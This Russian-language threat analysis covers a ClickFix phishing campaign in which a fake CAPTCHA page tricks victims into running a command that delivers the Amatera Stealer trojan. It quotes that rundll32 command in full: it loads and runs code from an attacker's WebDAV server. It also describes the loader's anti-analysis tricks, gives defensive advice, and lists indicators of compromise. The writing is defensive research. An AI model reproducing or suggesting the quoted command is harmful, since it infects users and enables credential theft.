Специалисты по информационной безопасности наблюдают рост сложности фишинговых кампаний, где социальная инженерия дополняется продвинутыми методами уклонения от обнаружения. Недавний инцидент, детально разобранный аналитиками, наглядно демонстрирует эту тенденцию: злоумышленники используют тактику, известную как ClickFix, чтобы заставить жертву самостоятельно выполнить команду, ведущую к удалённой загрузке вредоносного модуля и последующей краже данных троянцем Amatera Stealer. Эта атака нацелена на рядовых пользователей, которые могут не распознать подделку под легитимный процесс верификации.
Описание
В основе схемы лежит тщательно сфабрикованная веб-страница, имитирующая интерфейс проверки CAPTCHA или аналогичный механизм "подтверждения, что вы не робот". Однако вместо стандартного взаимодействия с элементом страницы жертве предлагается скопировать и вручную выполнить в системной командной строке (например, через Win+R) специфическую команду. В данном случае она имела вид: "rundll32.exe \\r2-gate-entry.terralibre.in[.]net@80\verification.google,#1". Ключевой элемент здесь - использование UNC-пути (Uniform Naming Convention) с синтаксисом "@80", который указывает на использование протокола WebDAV для представления удалённого ресурса в виде сетевой папки. Это позволяет утилите "rundll32.exe", стандартному компоненту Windows для запуска библиотек, загрузить и выполнить код напрямую с удалённого сервера, минуя этап сохранения файла на диск. Такой подход обходит многие сигнатуры антивирусов, ориентированные на сканирование файлов, и не вызывает типичных предупреждений браузера о загрузке.
Исполняемый модуль "verification.google", маскирующийся под безобидное имя, представляет собой сложно-обфусцированный загрузчик. Для затруднения статического анализа авторы применили инструмент OLLVM, а также реализовали технику хеширования имён импортируемых функций. Вместо стандартной загрузки библиотек через API Windows, код динамически вычисляет хеш-суммы требуемых функций (по алгоритму, подобному DJB2) и ищет их в памяти, что скрывает его истинные намерения от автоматизированных средств анализа. Дальнейшее исполнение сопровождается набором анти-отладочных и противодействующих мониторингу приёмов. Среди них - регистрация векторизированного обработчика исключений, установка аппаратных точек останова на функции, связанные с трассировкой событий Windows (ETW), и использование так называемого "небесного врата" (Heaven's Gate) для переключения между режимами выполнения процессора с целью скрытого вызова системных функций.
Финальным этапом работы этого загрузчика является расшифровка и исполнение в памяти shellcode, который, в свою очередь, загружает основную полезную нагрузку - троянец-стилер Amatera Stealer. Этот модуль отвечает непосредственно за сбор конфиденциальной информации с заражённой системы. Его работа также построена с расчётом на скрытность: вместо жёстко прописанного адреса сервера управления, стилер сначала обращается к домену "fc.denmap.cfd", чтобы получить URL конфигурации, размещённый на легитимной платформе для публикаций Telegra.ph. Этот документ содержал закодированный в Base64 IP-адрес C2-сервера ("78.153.150[.]32"), на который впоследствии отправлялись похищенные данные. Использование популярных и доверенных сервисов для промежуточных этапов позволяет атакующим маскировать вредоносный трафик и быстро изменять инфраструктуру.
Данная кампания иллюстрирует чётко выстроенную цепочку компрометации: от социальной инженерии (фишинговый сайт с ложной проверкой) и обхода технических защит (удалённая загрузка через WebDAV) до сложного выполнения кода (обфускация, противодействие анализу) и скрытого сбора данных (динамическое получение конфигурации). Для специалистов по защите это сигнал о необходимости усиливать мониторинг не только конечных точек, но и сетевых аномалий. Ключевые рекомендации включают в себя обучение пользователей, которые должны насторожиться при любой просьбе скопировать и выполнить команды из браузера, ограничение возможностей запуска "rundll32.exe" для загрузки кода из UNC-путей с помощью политик AppLocker или WDAC, а также контроль доступа к внешним ресурсам, включая нестандартное использование платформ вроде Telegra.ph для служебных запросов. Борьба с такими многоступенчатыми угрозами требует комплексного подхода, сочетающего технические средства и повышение осведомлённости.
Индикаторы компрометации
IPv4
- 78.153.150.32
Domains
- area2outer.boundarygateway.in.net
- ezjs.cl0udmere.in.net
- fc.denmap.cfd
- r2-gate-entry.terralibre.in.net
- svc2steel.exuviaestreamnet.in.net
- x9-space-v5.stratagrid.in.net
MD5
- baa1c1feed5c04e4b1e2f2ff88017fbb
- c2a0052c74e37562a8966fdd08aca0b7